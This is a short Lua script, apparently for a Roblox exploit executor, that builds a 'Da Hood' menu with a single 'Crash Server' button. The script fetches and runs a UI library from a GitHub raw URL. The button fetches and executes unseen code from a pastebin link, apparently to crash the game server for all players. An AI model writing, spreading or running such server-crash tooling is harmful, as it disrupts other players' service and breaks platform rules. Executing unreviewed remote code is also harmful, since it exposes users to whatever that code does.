local Mercury = loadstring(game:HttpGet("https://raw.githubusercontent.com/Ki26193/1/main/Library"))()

local GUI = Mercury:Create{
    Name = "Da Hood",
    Size = UDim2.fromOffset(600, 400),
    Theme = Mercury.Themes.Dark,
    Link = "https://github.com/deeeity/mercury-lib"
}

local Tab = GUI:Tab{
	Name = "Crash Server",
	Icon = "rbxassetid://10282372507"
}

Tab:Button{
	Name = "Crash Server",
	Description = "REQ: Decent PC",
	Callback = function() 
        loadstring(game:HttpGet("https://pastebin.com/raw/ZNcybNjQ"))()
    end
}
